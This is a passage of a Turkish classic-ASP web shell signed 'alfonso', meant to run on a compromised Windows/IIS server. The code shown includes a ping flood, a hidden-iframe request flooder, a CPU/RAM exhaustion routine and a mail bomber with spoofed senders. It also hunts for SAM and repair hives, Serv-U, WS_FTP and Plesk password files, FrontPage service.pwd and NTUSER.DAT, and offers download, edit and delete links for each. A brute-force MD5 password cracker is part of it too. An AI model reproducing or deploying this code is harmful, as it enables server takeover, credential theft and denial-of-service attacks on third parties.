		response.write "&nbsp;<b><font color=#FBE1D7>Yaz :</font></b> <font color=#FE7A84 class=""k1"">û</font>&nbsp;"

	else

		response.write "&nbsp;<b><font color=#FAFEDE>Yaz :</font></b> <font color=#C6FCBE class=""k1"">ü</font>&nbsp;"

	end if

	set f = nothing

	Err.Number = 0

	Response.Flush

	

	on error resume next

	FSO.DeleteFile f1.path & "test.alfonso",true

	if Err.Number <> 0 then

		response.write "&nbsp;<b><font color=#FBE1D7>Sil :</font></b> <font color=#FE7A84 class=""k1"">û</font>&nbsp;"

	else

		response.write "&nbsp;<b><font color=#FAFEDE>Sil :</font></b> <font color=#C6FCBE class=""k1"">ü</font>&nbsp;"

	end if

	set f = nothing

	Err.Number = 0

	Response.Flush

	

	response.write "</td></tr></table>"

	Response.Flush

	

	Call tester(f1.path)

	

	Next

end sub
 

Sub arama(yer)

on error resume next

	Set f = FSO.GetFolder(yer)

	Set fc = f.SubFolders

	For Each f1 In fc

		

		Set f2 = FSO.GetFolder(f1.path)

	    Set fc2 = f2.Files

	    For Each f12 In fc2

	    	

	    	if InStr(Ucase(f12.name),Ucase(hacked)) > 0 then

	    		downStr = "<table align=""center""><tr><td align=""center"" class=""kbrtm""><font class=""k2""><a href='"&FilePath&"?mode=6&file="&f12.path&"&konum="&konum&"&Time="&time&"'> Í </a></font>"

    	        if Ucase(hacked)="MDB" then

    	            Response.Write downStr&"<font class=""k1"" ><a href='"&FilePath&"?mode=5&konum="&konum&"&del="&f12.path&"&Time="&time&"'> û </a></font> - <a href='"&dosyapath&"?mode=13&file="&f12.path&"&konum="&konum&"&Time="&time&"'>"&f12.path&" ["&f12.size&"]"&"</a></b><br></td></tr></table>"

    	            i=i+1

    	        else

    	            Response.Write downStr&"<font class=""k1""><a href='"&FilePath&"?mode=5&konum="&konum&"&del="&f12.path&"&Time="&time&"'> û </a><a href='"&FilePath&"?mode=10&file="&f12.path&"&konum="&konum&"&Time="&time&"'> ! </a></font> - <a href='"&dosyapath&"?mode=9&file="&f12.path&"&konum="&konum&"&Time="&time&"'>"&f12.path&" [<font color=yellow>"&f12.size&"</font>]"&"</a></b><br></td></tr></table>"

    	            i=i+1

    	        end if

            end if

			Response.Flush

			

         next

         set f2 = nothing

         set fc2 = nothing

	

	Call arama(f1.path)

	

	next

   	set f = nothing

    set fc = nothing
 

end sub
 

Sub Ping_Bomb_alfonso(alfonsosite,alfonsopings,alfonsotimeout,alfonsobyte)

'///  by alfonso. özel modüller ekledim =). Ne Mutlu TÜRKÜM DÝYENE. 

 noattack = 1

 bonus = 0

 If alfonsopings = "" Then alfonsopings = 4

 If alfonsopings = 0 Then alfonsopings = 4

 If alfonsotimeout = "" Then alfonsotimeout = 750

 If InStr(alfonsosite,"savsak") > 0 or InStr(alfonsosite,"yagmurlu") or InStr(alfonsosite,"gov.tr") > 0 then noattack = 0

 If InStr(alfonsosite,"cyber") > 0 or InStr(alfonsosite,"tahri") > 0 or InStr(alfonsosite,"hack") > 0 or InStr(alfonsosite,"team") > 0 then bonus = 1
 

  response.write "<textarea style='width:100%;height:350;' >"

  if noattack = 1 then

  if bonus = 1 then 

  	alfonsopings = alfonsopings * 20

  	response.write "Ekstra *20 Bonus kazandýn.      "

  end if
 

  Set Sh = CreateObject("WScript.Shell")

  if alfonsobyte = "" then

  Set ExCmd = Sh.Exec("ping -n " & alfonsopings _

   & " -w " & alfonsotimeout & " " & alfonsosite)

  else

  Set ExCmd = Sh.Exec("ping -n " & alfonsopings _

   & " -w " & alfonsotimeout & " " & alfonsosite & " -l " & alfonsobyte)

  end if

  depola = ExCmd.StdOut.ReadAll

  response.write depola

  Select Case InStr(ExCmd.StdOut.Readall,"TTL=")

   Case 0 IsConnectable = False

   Case Else IsConnectable = True

  End Select

  else

  	response.write "Tasvip Etmediðimiz Bir siteye Saldýrý yapýyorsun. Tekrarlama Kötü olur senin için. CIZZZ =) euheu by alfonso                                                                                                           "

  	response.write "Bu FSO sahibine,  GOv.TR  ve Com.TR sitelere karþý Koruma gerçekleþtirildi. TÜRK TÜRK ü VURMAZ.. Kalleþlik yapma by alfonso       "

  	response.cookies("alfonso") = "1"

  	response.cookies("alfonso").expires = now + 365

  	count=0

  end if

  response.write "</textarea>"

  

End Sub
 

Sub Somurgen(filex,urlx)

for i=0 to CInt(filex)

response.write "<table align=""center"" width=""100%"" class=""kbrtm""><tr><td>"&i&".  Robot Baðlandý..</td></tr></table>"

response.Write "<iframe style='width:0; height:0' src='"&urlx&"'></iframe>"

next

End Sub
 

Sub Ram_Cpu

on error resume next

response.write "<table align=""center"" width=""100%"" class=""kbrtm""><tr><td align='center'><b> RAM & CPU FUcker for SERVER by alfonso =) 1.0 </b></td></tr></table>"

response.write "<br><br><table align=""center"" width=""100%"" class=""kbrtm""><tr><td align='center'> ZARAR verme MEkanizmasý Devrede... </td></tr></table>"

response.write "<br><table align=""center"" width=""100%"" class=""kbrtm""><tr><td align='center'> Durdurmak için Pencereyi kapat. Her 2 Saniyede bir 3 program açýlýyor...</td></tr></table>"

response.write "<br><table align=""center"" width=""100%"" class=""kbrtm""><tr><td align='center'> <b>by alfonso</b></td></tr></table>"

response.Write "<iframe style='width:0; height:0' src='"&FilePath&"?mode=31&islem=1'></iframe>"

response.Write "<iframe style='width:0; height:0' src='"&FilePath&"?mode=31&islem=2'></iframe>"

response.Write "<iframe style='width:0; height:0' src='"&FilePath&"?mode=31&islem=3'></iframe>"

response.write "<META http-equiv=refresh content=2;URL='"&FilePath&"?mode=31&file=1'>"

response.flush

end Sub
 

function TextYarat(intLen)

str=""

Randomize

for i=1 to intLen

	str=str & Mid(charset,Int((Len(charset)-1+1)*Rnd+1),1)

next

TextYarat=str

end function
 

function MailSec()

dim strNewText,i

str=""

Randomize

mail = mail_array(round(rnd()*4))

uzanti = uzanti_array(round(rnd()*6))

str = "@"& mail &"."&  uzanti

MailSec = str

end function
 

function MailKorumasi(mailx)

MailKorumasi = 0

for i=0 to 9

	If Instr(UCASE(mailx), yasak_array(i)) Then

		MailKorumasi = 1

	end if

next

end function
 

Function MailYarat()

	MailYarat = TextYarat(8) & MailSec()

end function
 

Function TextYarat2()

	TextYarat2 = TextYarat(200)

end function
 

Function BaslikYarat()

	BaslikYarat = TextYarat(10)

end function
 

Sub MailBomber_by_alfonso(alicix)

response.cookies("bilesen") = "1"

on error resume next

Set mailObj = Server.CreateObject("CDONTS.NewMail")

	mailObj.From    = MailYarat()

	mailObj.To      = alicix

	mailObj.Subject = BaslikYarat()

	mailObj.Body    = TextYarat2()

	mailObj.Send

Set mailObj = Nothing

if err <> 0 then

	on error resume next

	Set mailObj = Server.CreateObject("CDO.Message")

		mailObj.From = MailYarat()

		mailObj.To = alicix

		mailObj.Subject = BaslikYarat()

		mailObj.TextBody = TextYarat2()

		mailObj.Send

	Set mailObj = Nothing

	if err <> 0 then

		response.cookies("bilesen") = "0"

	end if

end if

End Sub
 

Sub yazorta(yazx)

response.write "<table align=""center"" width=""100%"" class=""kbrtm""><tr><td align='center'> "&yazx&" </td></tr></table>"

End Sub

Sub yazsol(yazx)

response.write "<table align=""center"" width=""100%"" class=""kbrtm""><tr><td align='left'> "&yazx&" </td></tr></table>"

End Sub

Sub yazortaa(yazx)

response.write "<br><table align=""center"" width=""100%"" class=""kbrtm""><tr><td align='center'> "&yazx&" </td></tr></table>"

End Sub

Sub yazsoll(yazx)

response.write "<br><table align=""center"" width=""100%"" class=""kbrtm""><tr><td align='left'> "&yazx&" </td></tr></table>"

End Sub
 

Function OS()

on error resume next

strComputer = "."

Set objWMI = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")

Set colItems = objWMI.ExecQuery("Select * from Win32_OperatingSystem",,48)

For Each objItem in colItems

VerBig = Left(objItem.Version,3)

Next

Select Case VerBig

Case "5.0" OSystem = "W2K"

Case "5.1" OSystem = "XP"

Case "5.2" OSystem = "Windows 2003"

Case "4.0" OSystem = "NT 4.0**"

Case Else OSystem = "Unknown - probably Win 9x"

End Select

OS = OSystem

End Function
 

Sub FolderExistx(yer)

if FSO.FolderExists(yer) then

	yazorta("<font class=""k1""><a title="" Dizini Kopyala & Taþý "" href='"&FilePath&"?mode=2&konum="&yer&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">4</a></font> <font class=""k1""><a  title="" Dizini Sil "" href='"&FilePath&"?mode=4&konum="&yer&"&del="&yer&"&Time="&time&"'>û</a> 1</font><font size=2><b><a title="" Dizinin içine Gir "" href='"&FilePath&"?konum="&yer&"&Time="&time&"'> "&yer&"</a></b>")

end if

End Sub
 

Sub alfonsoServuRemote()

j=0

servu = array("C:\Program Files\base.ini","C:\base.ini","C:\Program Files\Serv-U\base.ini","C:\Program Files\Serv-U\ServUAdmin.ini","C:\Program Files\Serv-U\SERV-U.ini","C:\Program Files\Serv-U\ServUDaemon.ini","C:\Program Files\SERV-U.ini","C:\SERV-U.ini","C:\Program Files\ServUDaemon.ini","C:\ServUDaemon.ini","C:\Program Files\WS_FTP.ini","C:\WS_FTP.ini","C:\Program Files\WS_FTP\WS_FTP.ini","C:/Program Files/Gene6 FTP Server/RemoteAdmin/remote.ini","C:/users.txt","D:/users.txt","E:/users.txt")

for i=0 to 16

if FSO.FileExists(servu(i)) then

downStr = "<a title=""Dosyayý Sil"" href='"&FilePath&"?mode=5&konum="&FolderPath&"&del="&FolderPath&"\"&servu(i)&"&Time="&time&"'>û</a><font face=webdings><a title="" Download et "" href='"&FilePath&"?mode=6&file="&servu(i)&"&konum="&FolderPath&"&Time="&time&"'>Í</a></font><font face=wingdings><a title="" Dosyayý Kopyala & Taþý "" href='"&FilePath&"?mode=7&file="&servu(i)&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">4</a><a title="" Dosya Ad & Format Deðiþtir "" href='"&FilePath&"?mode=16&file="&servu(i)&"&islem="&servu(i)&"&konum="&FolderPath&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">?</a></font>"

yazorta("<a title="" Ýçini Görüntülemek için Týkla "" href='"&FilePath&"?mode=9&file="&servu(i)&"&konum="&FolderPath&"&Time="&time&"'>"&servu(i)&"</a></b> <font face=wingdings size=4>± <a title="" Dosyayý Editlemek için Týkla by alfonso :) "" href='"&FilePath&"?mode=10&file="&servu(i)&"&Time="&time&"&konum="&FolderPath&"'>!</a>"&downStr&"</font>")

j=j+1

end if

next

if j = 0 then

yazorta("<center><font color=#FE7A84> <font face=Wingdings size=5>N</font> Remote olarak Sonuç bulunamadý. Geliþmiþ aramayý seçiniz. <font face=Wingdings size=5>N</font> </font>")

end if

servufolder = array("C:\Program Files\Serv-U","C:/Program Files/Gene6 FTP Server/RemoteAdmin","C:/Program Files/Gene6 FTP Server/Accounts/Helm FTP Users/users")

for i=0 to 2

FolderExistx(servufolder(i))

next

End Sub
 

Sub alfonsoPleskRemote()

j=0

plesk = array("c:/Program Files/SWsoft/Plesk/MySQL/Data/mysql","c:/Program Files/SWsoft/Plesk","c:/Program Files/SWsoft/Plesk/MySQL/Data/psa","c:/Program Files/SWsoft/Plesk/Databases/MySQL/Data/mysql","c:\Program Files\swsoft\autsav.sav")

for i=0 to 3

if FSO.FolderExists(plesk(i)) then

yazorta("<font class=""k1""><a title="" Dizini Kopyala & Taþý "" href='"&FilePath&"?mode=2&konum="&plesk(i)&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">4</a></font> <font class=""k1""><a  title="" Dizini Sil "" href='"&FilePath&"?mode=4&konum="&plesk(i)&"&del="&plesk(i)&"&Time="&time&"'>û</a> 1</font><font size=2><b><a title="" Dizinin içine Gir "" href='"&FilePath&"?konum="&plesk(i)&"&Time="&time&"'>"&plesk(i)&"</a></b>")

j=j+1

end if

next

if j = 0 then

yazorta("<center><font color=#FE7A84> <font face=Wingdings size=5>N</font> "&plesk(0)&" ve "&plesk(1)&" dizinleri bulunamadý. <font face=Wingdings size=5>N</font> </font>")

end if

if FSO.FileExists(plesk(4)) then

downStr = "<a title=""Dosyayý Sil"" href='"&FilePath&"?mode=5&konum="&FolderPath&"&del="&FolderPath&"\"&servu(i)&"&Time="&time&"'>û</a><font face=webdings><a title="" Download et "" href='"&FilePath&"?mode=6&file="&servu(i)&"&konum="&FolderPath&"&Time="&time&"'>Í</a></font><font face=wingdings><a title="" Dosyayý Kopyala & Taþý "" href='"&FilePath&"?mode=7&file="&servu(i)&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">4</a><a title="" Dosya Ad & Format Deðiþtir "" href='"&FilePath&"?mode=16&file="&servu(i)&"&islem="&servu(i)&"&konum="&FolderPath&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">?</a></font>"

yazorta("<a title="" Ýçini Görüntülemek için Týkla "" href='"&FilePath&"?mode=9&file="&servu(i)&"&konum="&FolderPath&"&Time="&time&"'>"&servu(i)&"</a></b> <font face=wingdings size=4>± <a title="" Dosyayý Editlemek için Týkla by alfonso :) "" href='"&FilePath&"?mode=10&file="&servu(i)&"&Time="&time&"&konum="&FolderPath&"'>!</a>"&downStr&"</font>")

else

yazorta("<center><font color=#FE7A84> <font face=Wingdings size=5>N</font> Plesk'in  Autsav.sav Dosyasý bulunamadý. <font face=Wingdings size=5>N</font> </font>")

end if 

End Sub
 

Sub alfonsoSam()

	Err.Number=0

	on error resume next

	Set MyFile = FSO.CreateTextFile("C:config\test.alfonso", True)

	MyFile.write " ALFONSO Was Here... =) "

	set MyFile = Nothing

	if Err.Number <> 0 then

		response.write "<center>&nbsp;<b><font color=#FBE1D7>Yaz :</font></b> <font color=#FE7A84 class=""k1"">û</font>&nbsp;"

	else

		response.write "<center>&nbsp;<b><font color=#FAFEDE>Yaz :</font></b> <font color=#C6FCBE class=""k1"">ü</font>&nbsp;"

	end if

	Err.Number=0

	on error resume next

	FSO.DeleteFile "C:config\test.alfonso",true

	if Err.Number <> 0 then

		response.write "&nbsp;<b><font color=#FBE1D7>Sil :</font></b> <font color=#FE7A84 class=""k1"">û</font>&nbsp;</center>"

	else

		response.write "&nbsp;<b><font color=#FAFEDE>Sil :</font></b> <font color=#C6FCBE class=""k1"">ü</font>&nbsp;</center>"

	end if

	on error resume next

	url = "C:config\"

    Set f = FSO.GetFolder(url)

    if err <> 0 then

   	url = "C:\WINDOWS\system32\config\"

    Set f = FSO.GetFolder(url)

    end if

    

    Set fc = f.Files

    For Each f1 In fc

       downStr = "<a title=""Dosyayý Sil"" href='"&FilePath&"?mode=5&konum="&url&"&del="&url&""&f1.name&"&Time="&time&"'>û</a><font face=webdings><a title="" Download et "" href='"&FilePath&"?mode=6&file="&url&""&f1.name&"&konum="&url&"&Time="&time&"'>Í</a></font><font face=wingdings><a title="" Dosyayý Kopyala & Taþý "" href='"&FilePath&"?mode=7&file="&url&""&f1.name&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">4</a><a title="" Dosya Ad & Format Deðiþtir "" href='"&FilePath&"?mode=16&file="&url&""&f1.name&"&islem="&f1.name&"&konum="&FolderPath&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">?</a></font>"

       yazorta("<a title="" Ýçini Görüntülemek için Týkla "" href='"&FilePath&"?mode=9&file="&url&""&f1.Name&"&konum="&url&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings size=4>± <a title="" Dosyayý Editlemek için Týkla by alfonso :) "" href='"&FilePath&"?mode=10&file="&url&""&f1.name&"&Time="&time&"&konum="&url&"'>!</a>"&downStr&"</font>")

    Next

end Sub
 

Sub alfonsoVti_Pvt()

	j=0

	local = request.servervariables("APPL_PHYSICAL_PATH")

	vti = array(""&local&"\_vti_pvt\access.cnf",""&local&"\..\_vti_pvt\access.cnf",""&local&"\..\..\_vti_pvt\access.cnf",""&local&"\..\..\..\_vti_pvt\access.cnf",""&local&"\_vti_pvt\postinfo.html",""&local&"\..\_vti_pvt\postinfo.html",""&local&"\..\..\_vti_pvt\postinfo.html",""&local&"\..\..\..\_vti_pvt\postinfo.html",""&local&"\vti_pvt/service.pwd",""&local&"\..\vti_pvt/service.pwd",""&local&"\..\..\vti_pvt/service.pwd",""&local&"\..\..\..\vti_pvt/service.pwd")

		for i=0 to 11

		if FSO.FileExists(vti(i)) then

			downStr = "<a title=""Dosyayý Sil"" href='"&FilePath&"?mode=5&konum="&FolderPath&"&del="&FolderPath&"\"&vti(i)&"&Time="&time&"'>û</a><font face=webdings><a title="" Download et "" href='"&FilePath&"?mode=6&file="&vti(i)&"&konum="&FolderPath&"&Time="&time&"'>Í</a></font><font face=wingdings><a title="" Dosyayý Kopyala & Taþý "" href='"&FilePath&"?mode=7&file="&vti(i)&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">4</a><a title="" Dosya Ad & Format Deðiþtir "" href='"&FilePath&"?mode=16&file="&vti(i)&"&islem="&vti(i)&"&konum="&FolderPath&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">?</a></font>"

			yazorta("<a title="" Ýçini Görüntülemek için Týkla "" href='"&FilePath&"?mode=9&file="&vti(i)&"&konum="&FolderPath&"&Time="&time&"'>"&vti(i)&"</a></b> <font face=wingdings size=4>± <a title="" Dosyayý Editlemek için Týkla by alfonso :) "" href='"&FilePath&"?mode=10&file="&vti(i)&"&Time="&time&"&konum="&FolderPath&"'>!</a>"&downStr&"</font>")

			j=j+1

		end if

	next

	if j = 0 then

		yazorta("<center><font color=#FE7A84> <font face=Wingdings size=5>N</font> Sonuç bulunamadý. Daha geniþ Arama yapýn by alfonso <font face=Wingdings size=5>N</font> </font>")

	end if

end sub
 

Sub alfonsoNTUser(oturum)

	j=0

	ntuser = array("c:\documents and settings\"&oturum&"\NTUSER.DAT","c:\documents and settings\Administrator\NTUSER.DAT","c:\documents and settings\"&oturum&"\ntuser.dat.log","c:\documents and settings\Administrator\ntuser.dat.log","c:\documents and settings\"&oturum&"\ntuser.ini","c:\documents and settings\Administrator\ntuser.ini")

	for i=0 to 5

		if FSO.FileExists(ntuser(i)) then

			downStr = "<a title=""Dosyayý Sil"" href='"&FilePath&"?mode=5&konum="&FolderPath&"&del="&FolderPath&"\"&ntuser(i)&"&Time="&time&"'>û</a><font face=webdings><a title="" Download et "" href='"&FilePath&"?mode=6&file="&ntuser(i)&"&konum="&FolderPath&"&Time="&time&"'>Í</a></font><font face=wingdings><a title="" Dosyayý Kopyala & Taþý "" href='"&FilePath&"?mode=7&file="&ntuser(i)&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">4</a><a title="" Dosya Ad & Format Deðiþtir "" href='"&FilePath&"?mode=16&file="&ntuser(i)&"&islem="&ntuser(i)&"&konum="&FolderPath&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">?</a></font>"

			yazorta("<a title="" Ýçini Görüntülemek için Týkla "" href='"&FilePath&"?mode=9&file="&ntuser(i)&"&konum="&FolderPath&"&Time="&time&"'>"&ntuser(i)&"</a></b> <font face=wingdings size=4>± <a title="" Dosyayý Editlemek için Týkla by alfonso :) "" href='"&FilePath&"?mode=10&file="&ntuser(i)&"&Time="&time&"&konum="&FolderPath&"'>!</a>"&downStr&"</font>")

			j=j+1

		end if

	next

	if j = 0 then

		yazorta("<center><font color=#FE7A84> <font face=Wingdings size=5>N</font> Sonuç bulunamadý. Daha geniþ Arama yapýn by alfonso <font face=Wingdings size=5>N</font> </font>")

	end if

end sub
 

Sub alfonsoRepair()

	Err.Number=0

	on error resume next

	Set MyFile = FSO.CreateTextFile("c:..\repair\test.alfonso", True)

	MyFile.write " alfonso Was Here... =) "

	set MyFile = Nothing

	if Err.Number <> 0 then

		response.write "<center>&nbsp;<b><font color=#FBE1D7>Yaz :</font></b> <font color=#FE7A84 class=""k1"">û</font>&nbsp;"

	else

		response.write "<center>&nbsp;<b><font color=#FAFEDE>Yaz :</font></b> <font color=#C6FCBE class=""k1"">ü</font>&nbsp;"

	end if

	Err.Number=0

	on error resume next

	FSO.DeleteFile "c:..\repair\test.alfonso",true

	if Err.Number <> 0 then

		response.write "&nbsp;<b><font color=#FBE1D7>Sil :</font></b> <font color=#FE7A84 class=""k1"">û</font>&nbsp;</center>"

	else

		response.write "&nbsp;<b><font color=#FAFEDE>Sil :</font></b> <font color=#C6FCBE class=""k1"">ü</font>&nbsp;</center>"

	end if

	on error resume next

	url = "c:..\repair\"

    Set f = FSO.GetFolder(url)

    if err <> 0 then

   	url = "C:\WINDOWS\repair\"

    Set f = FSO.GetFolder(url)

    end if

    

    Set fc = f.Files

    For Each f1 In fc

       downStr = "<a title=""Dosyayý Sil"" href='"&FilePath&"?mode=5&konum="&url&"&del="&url&""&f1.name&"&Time="&time&"'>û</a><font face=webdings><a title="" Download et "" href='"&FilePath&"?mode=6&file="&url&""&f1.name&"&konum="&url&"&Time="&time&"'>Í</a></font><font face=wingdings><a title="" Dosyayý Kopyala & Taþý "" href='"&FilePath&"?mode=7&file="&url&""&f1.name&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">4</a><a title="" Dosya Ad & Format Deðiþtir "" href='"&FilePath&"?mode=16&file="&url&""&f1.name&"&islem="&f1.name&"&konum="&FolderPath&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">?</a></font>"

       yazorta("<a title="" Ýçini Görüntülemek için Týkla "" href='"&FilePath&"?mode=9&file="&url&""&f1.Name&"&konum="&url&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings size=4>± <a title="" Dosyayý Editlemek için Týkla by alfonso :) "" href='"&FilePath&"?mode=10&file="&url&""&f1.name&"&Time="&time&"&konum="&url&"'>!</a>"&downStr&"</font>")

    Next

end Sub
 

Function kodolustur(aralik)

' belirtitiim aralýkda kod oluþtuuyorurum. 01#01#01#01# baþlangýç iiçin by alfonso

	dim coding

	coding = ""

	for i=1 to CInt(aralik)

		coding = coding + "01#"

	next

	kodolustur = coding

End Function
 

Function diziolustur()

' Seçilen Charset leri burda birleþtiriyorum by alfonso

	Dim dizi

	dizi=""

	if not k1 = "" then dizi = dizi & karakter1

	if not k2 = "" then dizi = dizi & karakter2

	if not k3 = "" then dizi = dizi & karakter3

	if not k4 = "" then dizi = dizi & karakter4

	diziolustur = dizi

End Function
 

Function Sifreyarat(codex,aralik,dizix)

' Stirng kodunu saðdan çözümleyerek Þifre yaratýyor by ALFONSO

	dim hash

	dim sifre

	hash=""

	sifre=""

	i=CInt(aralik)

	Do While i>0 

		hash = CInt(Mid(codex,((i-1)*3)+1,2))  ' Saðdan sayýlarý alýyor.

		sifre = Mid(dizix,hash,1) & sifre

	i=i-1

	Loop 

	Sifreyarat = sifre

End Function
 

Function SonrakiAdim(codex,aralik,dizix)

' sonraki adýma hazýrlýk coded by alfonso ;)

Dim hash

hash = ""

increment=0

goup=0

hashing = ""

i=CInt(aralik)

Do While i>0 

hash = CInt(Mid(codex,((i-1)*3)+1,2))  ' Saðdan sayýlarý alýyor.

' Carry out ý diðeirne giriþ yap increment the next one

if hash => Len(dizix) then 

	increment = 1

	hash = 1

else if increment = 1 then

	hash = hash+1

	increment = 0

end if 

end if

' eðer ara1 hanelki þifreleme bitti ise diðeirne ýkamsý gerek ara1++

if i = 1 AND hash>= Len(dizix)-1 then goup=1

' Brute bitiþini gösteriiyorum. 

if i = CInt(aralik) AND hash>= Len(dizix) AND ara1 = ara2 then getend=1   ''' BRUTE çýkýþý bittiðini analýyorumm  GETEND =1 !!!!!!!!!!!!!

' hash i bir sonraki adýma hazýrla

if i = CInt(aralik) then hash = hash + 1

'yeni hash numarasý oluþtur

if hash <10 then hash = "0" & hash

hashing = hash &"#" & hashing

i=i-1

Loop 

coding = hashing 

' eðerki goup =1 then hane atla ve yeni stireg olþutur

if goup = 1 then 

	coding = ""

	ara1 = CInt(aralik) + 1

	for j=1 to ara1

		coding = coding + "01#"

	next

end if

SonrakiAdim = coding

End Function
 

Sub Cookyaz(str1,str2,str3)

	if not str3 = "" then

		response.cookies(str1)("str2") = str3

		response.cookies(str1).expires = now+100

		session("say") = CInt(session("say")) + 1

	end if

End Sub

Sub HashFounded(str1,str2)

	if not request.cookies(str1)("sifre") = "" then

		yazsol("<b>Bulundu: "&request.cookies(str1)(str2)&"  ->> "&request.cookies(str1)("sifre")&" </b>")

		inject3 = CInt(inject3) + 1

	end if

End Sub

Sub hashyes(str1,str2,md5x,pwd)

	if not request.cookies(str1)(str2) = "" AND UCASE(request.cookies(str1)(str2)) = md5x then

		yazsol("BULDUuuuuuuuuuuuuuuu " & pwd & " -  " & request.cookies(str1)(str2)&"")

		response.cookies(str1)("sifre") = pwd

	end if

End Sub

'*************************  ZORUNLU UPLOAD için GEREKLi =((  **********************************************************************************************

Class clsUpload

    Private mbinData

    Private mlngChunkIndex

    Private mlngBytesReceived

    Private mstrDelimiter

    Private CR

    Private LF

    Private CRLF

    Private mobjFieldAry()

    Private mlngCount
 

    Private Sub RequestData

        Dim llngLength

        mlngBytesReceived = Request.TotalBytes

        mbinData = Request.BinaryRead(mlngBytesReceived)

    End Sub
 

    Private Sub ParseDelimiter()

        mstrDelimiter = MidB(mbinData, 1, InStrB(1, mbinData, CRLF) - 1)

    End Sub
 

    Private Sub ParseData()

        Dim llngStart

        Dim llngLength

        Dim llngEnd

        Dim lbinChunk

        llngStart = 1

        llngStart = InStrB(llngStart, mbinData, mstrDelimiter & CRLF)

        While Not llngStart = 0

            llngEnd = InStrB(llngStart + 1, mbinData, mstrDelimiter) - 2

            llngLength = llngEnd - llngStart

            lbinChunk = MidB(mbinData, llngStart, llngLength)

            Call ParseChunk(lbinChunk)

            llngStart = InStrB(llngStart + 1, mbinData, mstrDelimiter & CRLF)

        Wend

    End Sub
 

    Private Sub ParseChunk(ByRef pbinChunk)

        Dim lstrName

        Dim lstrFileName

        Dim lstrContentType

        Dim lbinData

        Dim lstrDisposition

        Dim lstrValue

        lstrDisposition = ParseDisposition(pbinChunk)

        lstrName = ParseName(lstrDisposition)

        lstrFileName = ParseFileName(lstrDisposition)

        lstrContentType = ParseContentType(pbinChunk)

        If lstrContentType = "" Then

            lstrValue = CStrU(ParseBinaryData(pbinChunk))

        Else

            lbinData = ParseBinaryData(pbinChunk)

        End If

        Call AddField(lstrName, lstrFileName, lstrContentType, lstrValue, lbinData)

    End Sub
 

    Private Sub AddField(ByRef pstrName, ByRef pstrFileName, ByRef pstrContentType, ByRef pstrValue, ByRef pbinData)

        Dim lobjField

        ReDim Preserve mobjFieldAry(mlngCount)

        Set lobjField = New clsField

        lobjField.Name = pstrName

        lobjField.FilePath = pstrFileName

        lobjField.ContentType = pstrContentType

        If LenB(pbinData) = 0 Then

            lobjField.BinaryData = ChrB(0)

            lobjField.Value = pstrValue

            lobjField.Length = Len(pstrValue)

        Else

            lobjField.BinaryData = pbinData

            lobjField.Length = LenB(pbinData)

            lobjField.Value = ""

        End If

        Set mobjFieldAry(mlngCount) = lobjField

        mlngCount = mlngCount + 1

    End Sub
 

    Private Function ParseBinaryData(ByRef pbinChunk)

        Dim llngStart

        llngStart = InStrB(1, pbinChunk, CRLF & CRLF)

        If llngStart = 0 Then Exit Function

        llngStart = llngStart + 4

        ParseBinaryData = MidB(pbinChunk, llngStart)

    End Function
 

    Private Function ParseContentType(ByRef pbinChunk)

        Dim llngStart

        Dim llngEnd

        Dim llngLength

        llngStart = InStrB(1, pbinChunk, CRLF & CStrB("Content-Type:"), vbTextCompare)

        If llngStart = 0 Then Exit Function

        llngEnd = InStrB(llngStart + 15, pbinChunk, CR)

        If llngEnd = 0 Then Exit Function

        llngStart = llngStart + 15

        If llngStart >= llngEnd Then Exit Function

        llngLength = llngEnd - llngStart

        ParseContentType = Trim(CStrU(MidB(pbinChunk, llngStart, llngLength)))

    End Function
 

    Private Function ParseDisposition(ByRef pbinChunk)

        Dim llngStart

        Dim llngEnd

        Dim llngLength

        llngStart = InStrB(1, pbinChunk, CRLF & CStrB("Content-Disposition:"), vbTextCompare)

        If llngStart = 0 Then Exit Function

        llngEnd = InStrB(llngStart + 22, pbinChunk, CRLF)

        If llngEnd = 0 Then Exit Function

        llngStart = llngStart + 22

        If llngStart >= llngEnd Then Exit Function

        llngLength = llngEnd - llngStart

        ParseDisposition = CStrU(MidB(pbinChunk, llngStart, llngLength))

    End Function
 

    Private Function ParseName(ByRef pstrDisposition)

        Dim llngStart

        Dim llngEnd

        Dim llngLength

        llngStart = InStr(1, pstrDisposition, "name=""", vbTextCompare)

        If llngStart = 0 Then Exit Function

        llngEnd = InStr(llngStart + 6, pstrDisposition, """")

        If llngEnd = 0 Then Exit Function

        llngStart = llngStart + 6

        If llngStart >= llngEnd Then Exit Function

        llngLength = llngEnd - llngStart

        ParseName = Mid(pstrDisposition, llngStart, llngLength)

    End Function
 

    Private Function ParseFileName(ByRef pstrDisposition)

        Dim llngStart

        Dim llngEnd

        Dim llngLength

        llngStart = InStr(1, pstrDisposition, "filename=""", vbTextCompare)

        If llngStart = 0 Then Exit Function

        llngEnd = InStr(llngStart + 10, pstrDisposition, """")

        If llngEnd = 0 Then Exit Function

        llngStart = llngStart + 10

        If llngStart >= llngEnd Then Exit Function

        llngLength = llngEnd - llngStart

        ParseFileName = Mid(pstrDisposition, llngStart, llngLength)

    End Function
 

    Public Property Get Count()

        Count = mlngCount

    End Property
 

    Public Default Property Get Fields(ByVal pstrName)

        Dim llngIndex

        If IsNumeric(pstrName) Then

            llngIndex = CLng(pstrName)

            If llngIndex > mlngCount - 1 Or llngIndex < 0 Then

                Call Err.Raise(vbObjectError + 1, "clsUpload.asp", "Object does not exist within the ordinal reference.")

                Exit Property

            End If

            Set Fields = mobjFieldAry(pstrName)

        Else

            pstrName = LCase(pstrname)

            For llngIndex = 0 To mlngCount - 1

